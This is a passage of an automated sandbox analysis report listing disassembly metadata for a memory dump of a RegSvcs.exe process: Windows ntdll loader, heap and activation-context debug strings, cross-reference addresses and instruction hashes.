                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01492624
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014922E4
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01492409
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01492506
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014925EB
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014924C0
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01492602
                                                                        • @, xrefs: 0149259B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: bd52e5143725040ee22edf66f8c3de0502ff6ac159b0e0e625c44685dea23657
                                                                        • Instruction ID: 888f73dd47ae1f7db553effb55d688f1c241389d9e32d743a6ec32d4f13c243f
                                                                        • Opcode Fuzzy Hash: bd52e5143725040ee22edf66f8c3de0502ff6ac159b0e0e625c44685dea23657
                                                                        • Instruction Fuzzy Hash: 650284B1D00229ABDF71DB55CC80FDAB7B8AB54304F4041EBEA09A7262D7706E85CF59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 0c83abf601786824011bab6194c9e5f1e06aad1e4ff5f9e2112854f0acd7f3be
                                                                        • Instruction ID: 2c41340f15f55e98ed5f2eb769c186be12880d444ccf6ccb36a273c17ca30016
                                                                        • Opcode Fuzzy Hash: 0c83abf601786824011bab6194c9e5f1e06aad1e4ff5f9e2112854f0acd7f3be
                                                                        • Instruction Fuzzy Hash: B151E0791043129BC365CF198844BABBBECEF94B58F14091EEA59C3260E770D609CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-3197712848
                                                                        • Opcode ID: ce849b479121312db9986d0bbfac19f0070b363e0c28451b84d95b76b6ba8fd8
                                                                        • Instruction ID: ca7c982fd32467c3fec989d1617817aa3f1027ca4d136cb24abd735a6e7ac16e
                                                                        • Opcode Fuzzy Hash: ce849b479121312db9986d0bbfac19f0070b363e0c28451b84d95b76b6ba8fd8
                                                                        • Instruction Fuzzy Hash: 3712FEB1A083428BD321DB29C450BABB7E1FBD8714F55092FE9C58B3A1E734D905CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
                                                                        • Instruction ID: d0d7203109662c9cfc269e09edea84613866ca2398125836f108e0ddd07775bf
                                                                        • Opcode Fuzzy Hash: 77bbb6585781cfd8da90a8081b6d0add1dda205e23c6ef2133d36f78c4dcd667
                                                                        • Instruction Fuzzy Hash: 67D1CB35600686EFDF22DF69C460AAABBF1FF59710F18805EF9499B362C7349942CB10
                                                                        Strings
                                                                        • VerifierDebug, xrefs: 014A8CA5
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014A8A67
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 014A8B8F
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014A8A3D
                                                                        • HandleTraces, xrefs: 014A8C8F
                                                                        • VerifierFlags, xrefs: 014A8C50
                                                                        • VerifierDlls, xrefs: 014A8CBD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: 7af95a82c8504ae88f4ed2973f3f6510c32e5fcd849b3a02f80cf6f73bf6b652
                                                                        • Instruction ID: 5bc44ce9080fe7f7ed9005cd711d07a64e7536770af910b3c3485b5e38777a83
                                                                        • Opcode Fuzzy Hash: 7af95a82c8504ae88f4ed2973f3f6510c32e5fcd849b3a02f80cf6f73bf6b652
                                                                        • Instruction Fuzzy Hash: 10913272601303AFE322EF29D880B5B77A4EBB5A14F87041EFA516F261D3709C05CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • API String ID: 0-1109411897
                                                                        • Opcode ID: 795a6c701ebd16444e32b4d3ea3632ab7fd7732d83dcf32a2250fa22427f2f98
                                                                        • Instruction ID: d881c7a6ce7c1916cc3e235bcef9c4f0dbe6ab3ea8c51238fb1585bd1831cdd4
                                                                        • Opcode Fuzzy Hash: 795a6c701ebd16444e32b4d3ea3632ab7fd7732d83dcf32a2250fa22427f2f98
                                                                        • Instruction Fuzzy Hash: 01A24A74A0562A8FDB64DF19C8987AEBBB5AF45304F5442EAD90DA7360DB309EC5CF00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
                                                                        • Instruction ID: 73be6e96938dc5e45bd60d5be160becb6f06d182ce75ae329d9aecdad9e922af
                                                                        • Opcode Fuzzy Hash: 116bb20fbfacd9226e81518e80efb0b8990186fd3b63f910591018577d175587
                                                                        • Instruction Fuzzy Hash: EE918A70B003129BEF36DF19D945BAA3FA1BB52B24F56002FE9106B3B2D7B44802C794
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01479A11, 01479A3A
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01479A01
                                                                        • LdrpInitShimEngine, xrefs: 014799F4, 01479A07, 01479A30
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01479A2A
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014799ED
                                                                        • apphelp.dll, xrefs: 01416496
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-204845295
                                                                        • Opcode ID: 7ead988855caf62a77617c1321ccddcf80fb788b43d443fdebedd12aa900d7dd
                                                                        • Instruction ID: 890d4706493bc751ca5a08ee8af25f88387d6667b8d2c4072eb51ca47d0641f1
                                                                        • Opcode Fuzzy Hash: 7ead988855caf62a77617c1321ccddcf80fb788b43d443fdebedd12aa900d7dd
                                                                        • Instruction Fuzzy Hash: 4D5125712083019FE722EF25D841F9B77E8FB94658F01092FF5959B2B4D670E944CB92
                                                                        Strings
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0149219F
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01492165
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01492160, 0149219A, 014921BA
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014921BF
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01492178
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01492180
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: 2537561b6723bf65ee2dc32981fcf10c33626696ff7975704d728b67c55476cd
                                                                        • Instruction ID: fa3ab336d0c68f2198402695226f4228403077dfbdd4ffab347360447fe4537c
                                                                        • Opcode Fuzzy Hash: 2537561b6723bf65ee2dc32981fcf10c33626696ff7975704d728b67c55476cd
                                                                        • Instruction Fuzzy Hash: 90313B77B00211B7EB11CA9A9C81F5F7F78DB65A40F05006FFA0467272D3B0AA01C7A1
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01498181, 014981F5
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0145C6C3
                                                                        • LdrpInitializeProcess, xrefs: 0145C6C4
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01498170
                                                                        • LdrpInitializeImportRedirection, xrefs: 01498177, 014981EB
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 014981E5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 6bb9af2f63aa04918e9d46b40f6a8c54947f669e6289030c77f4d75d429e36e2
                                                                        • Instruction ID: 5b10ac683a485c3752cd457a3ad9a8e39c9e410d9927aefa314da40231c80e53
                                                                        • Opcode Fuzzy Hash: 6bb9af2f63aa04918e9d46b40f6a8c54947f669e6289030c77f4d75d429e36e2
                                                                        • Instruction Fuzzy Hash: D3313471604306AFD321EF2AD846E1B7B94EFA5B14F05051EF9446B3B1D670ED04C7A2
                                                                        APIs
                                                                          • Part of subcall function 01462DF0: LdrInitializeThunk.NTDLL ref: 01462DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01460D74
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: 7e4b788887c19774e3186f6c5d4bf1d96e8bad950949895e48a96fed3920ae37
                                                                        • Instruction ID: be7722452b93ba7e49f1b3a722860038372aafb2e775258beb59911b2b78ba9c
                                                                        • Opcode Fuzzy Hash: 7e4b788887c19774e3186f6c5d4bf1d96e8bad950949895e48a96fed3920ae37
                                                                        • Instruction Fuzzy Hash: C3425A719007159FDB21CF28C880BAABBF9FF14318F0445AEE9899B351D770AA85CF61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                        • API String ID: 0-379654539
                                                                        • Opcode ID: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
                                                                        • Instruction ID: 8d3d1b25b7a3cec206ee42ff5c7d7af947ca35889ad489cecc251ab2b5a02861
                                                                        • Opcode Fuzzy Hash: 70f4397bec24a792dbbab7321f74d15ae149b30090675f2571b0ce5551800126
                                                                        • Instruction Fuzzy Hash: 2AC1A8741083928FD721DF58C144B6BBBE4BF94304F50496BF9968BB61E374C98ACB52
                                                                        Strings
                                                                        • @, xrefs: 01458591
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01458421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0145855E
                                                                        • LdrpInitializeProcess, xrefs: 01458422
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
                                                                        • Instruction ID: 6a7f3be9731f60a2f9ab1d366a308d2c03f42dece25aaed240abe4e76ae72117
                                                                        • Opcode Fuzzy Hash: a77c41e02fb70bff44ca3a883d773fb1e0a0dd319e19e48b642bbe4161b937c4
                                                                        • Instruction Fuzzy Hash: 96919F71508346AFD762DF26CC41F6BBAECFB94658F40092FFA8496162E770D904CB62
                                                                        Strings
                                                                        • .Local, xrefs: 014528D8
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014922B6
                                                                        • SXS: %s() passed the empty activation context, xrefs: 014921DE
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014921D9, 014922B1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: a68bda192c1391d48d456e046c276d0dc298c9e67e7ca6341cbfcf6c93b1c7ff
                                                                        • Instruction ID: 3783f79714fdc324199df11adf834b6102474dafe03e8977cfcc33c46450a148
                                                                        • Opcode Fuzzy Hash: a68bda192c1391d48d456e046c276d0dc298c9e67e7ca6341cbfcf6c93b1c7ff
                                                                        • Instruction Fuzzy Hash: 3DA1B335A00229DBDB65CF59D884F9AB7B0BF58314F1541EBD908AB362D7709E81CF90
                                                                        Strings
                                                                        • RtlDeactivateActivationContext, xrefs: 01493425, 01493432, 01493451
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01493456
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0149342A
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01493437
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: d49d04105aa42e638a3ac5927413755eec869f9e5278e43d8eeeffb58b715b81
                                                                        • Instruction ID: 6086464c78546f53f15ec3136c4d8876445d8cebca6f3b7e175f497a23b0e154
                                                                        • Opcode Fuzzy Hash: d49d04105aa42e638a3ac5927413755eec869f9e5278e43d8eeeffb58b715b81
                                                                        • Instruction Fuzzy Hash: 006114366006129BDB23CF29C841B2BBBE1EF90B50F1A852FE9559F361D730E841CB91
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0148106B
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01481028
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014810AE
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01480FE5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: afd552a4cc836205e249d68be37785a02d6ed4e223be132071be892527fbefdd
                                                                        • Instruction ID: d8f3c8a6e6cdbf1d632a9206578de6c95c0b4ef43ac0c14e78310e22b254cec4
                                                                        • Opcode Fuzzy Hash: afd552a4cc836205e249d68be37785a02d6ed4e223be132071be892527fbefdd
                                                                        • Instruction Fuzzy Hash: 297101B19043159FCB21EF15C884B9B7BA8AFA4754F40046AFD488B26AD370D1C9CBD2
                                                                        Strings
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01493640, 0149366C
                                                                        • LdrpFindDllActivationContext, xrefs: 01493636, 01493662
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0149362F
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0149365C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: d1f8c1ebbe4e33a25d8ad88dc80fe8dbbb17b471274ea9fdbf153b41589e2f85
                                                                        • Instruction ID: 6733a739ba62ceaefdab704b309b822011c486f799d584004aebe9384bc7eb0b
                                                                        • Opcode Fuzzy Hash: d1f8c1ebbe4e33a25d8ad88dc80fe8dbbb17b471274ea9fdbf153b41589e2f85
                                                                        • Instruction Fuzzy Hash: E331F822900211AADF739B5DC848B677AA4BB02654F0E412BED185F373F7B09CCA87D5
                                                                        Strings
                                                                        • LdrpDynamicShimModule, xrefs: 0148A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0148A9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0148A992
                                                                        • apphelp.dll, xrefs: 01442462
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
                                                                        • Instruction ID: 92ee43c7718be0fde8c007ff03d9bc5a618afc364a88b21349369ff5eadd2211
                                                                        • Opcode Fuzzy Hash: 55d8b6681495bff6e75f32e95acf64b5f302f04da27672a0df82e38c40ed4e5f
                                                                        • Instruction Fuzzy Hash: A0312975600202ABD732AF59D885E6EBBB4FB84714F27006FF9106B365C7F45986D740
                                                                        Strings
                                                                        • HEAP: , xrefs: 01433264
                                                                        • HEAP[%wZ]: , xrefs: 01433255
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0143327D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 889743bd47919fdb3b29977b48bc4f6ab9b1e5e991314a6704ecddc2bf29ae85
                                                                        • Instruction ID: 123f34774a022377f6ee31b7f4292631afc7eaddcd4b2816e68c0e5c5e925e6c
                                                                        • Opcode Fuzzy Hash: 889743bd47919fdb3b29977b48bc4f6ab9b1e5e991314a6704ecddc2bf29ae85
                                                                        • Instruction Fuzzy Hash: 1892CE71A042499FEB25CF69C444BAEBBF1FF88310F14805EE859AB3A1D774A946CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: c0fa2fadbe869f1e8e44cc7c74460b9f0b444b00c3bd99a192c7dec67ce2819c
                                                                        • Instruction ID: 5bb6f18abf3fe07fd6437b029337a4409ea53915cb5fff30cb84ec2624cd670c
                                                                        • Opcode Fuzzy Hash: c0fa2fadbe869f1e8e44cc7c74460b9f0b444b00c3bd99a192c7dec67ce2819c
                                                                        • Instruction Fuzzy Hash: 1FF1AE30A00605DFEB25DF69C894B6EB7B5FF88304F14426AE4169B3A1D734E982CF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        • Opcode ID: 52950880d0f59b4e17ca71d58db381aa9fdda155e9921acab5bc62333b8cbf77
                                                                        • Instruction ID: fadec01d959eaef3c047715323687b952edcd72be61f7d4077b3f0de802e014f
                                                                        • Opcode Fuzzy Hash: 52950880d0f59b4e17ca71d58db381aa9fdda155e9921acab5bc62333b8cbf77
                                                                        • Instruction Fuzzy Hash: C1C292716083419FE725CF29C481BABBBE5BF88754F05892EE989C7361D734D806CB62
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
                                                                        • Instruction ID: b1b5d1e57e3a1acba6c891f8c2535b68f57f2e159be4398eccd1310e49ed8676
                                                                        • Opcode Fuzzy Hash: f7bb902222e61b06f82142f7c5b00adb0dbbf43d9bd4f745db61a22576b16a20
                                                                        • Instruction Fuzzy Hash: EEA16F7191122A9BDB31DF64CC88BEAB7B8EF54714F1001EBE909A7260D7359E85CF50
                                                                        Strings
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0148A10F
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0148A121
                                                                        • LdrpCheckModule, xrefs: 0148A117
